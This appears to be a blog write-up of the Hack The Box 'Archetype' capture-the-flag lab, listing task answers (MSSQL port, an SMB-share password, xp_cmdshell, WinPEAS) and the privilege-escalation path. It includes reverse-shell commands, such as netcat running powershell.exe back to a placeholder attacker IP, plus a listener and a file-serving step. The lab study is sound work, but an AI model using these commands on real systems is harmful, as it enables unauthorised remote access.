type
status
date
slug
summary
tags
category
icon
password
Status
Due date
Sep 18, 2023 04:16 AM
Progress
Task1:Which TCP port is hosting a database server?
1433
Task2:What is the name of the non-Administrative share available over SMB?
Task3:What is the password identified in the file on the SMB share?
M3g4c0rp123
Task4:What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
Task5:What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
Task6:What script can be used in order to search possible paths to escalate privileges on Windows hosts?
winpeas
先創造reverse shell,上傳nc.exe
![python3 -m http.server [port]](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F879c4752-998e-4320-b868-ac6285eb1585%2FUntitled.png?table=block&id=48ae8b4b-900c-4fb5-ae31-fa8d3c2143c7)
![nc.exe -e powershell.exe [attacker ip] [attacker listening port]](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fe98e4b1d-0b59-4c4d-9d9d-b6432cbca624%2FUntitled.png?table=block&id=2e2d4099-38dd-4f7c-83b8-6745ea4e9593)
![nc -lvnp [attacker listening port]](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F74bfdfac-43ab-43a2-ab57-3e5959c492d7%2FUntitled.png?table=block&id=3202f086-203b-4b5b-950c-2075f70bb65a)
在victim中安裝winpeas
Task7:What file contains the administrator's password?
執行完winpeas,先看history
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
登入administrator
Sumit user flag
Sumit root flag
Reference
- 作者:ji3g4gp
- 連結:https://gpblog.vercel.app//article/HTB-Archetype
- 著作權:本文採用 CC BY-NC-SA 4.0 許可協議,轉載請註明出處。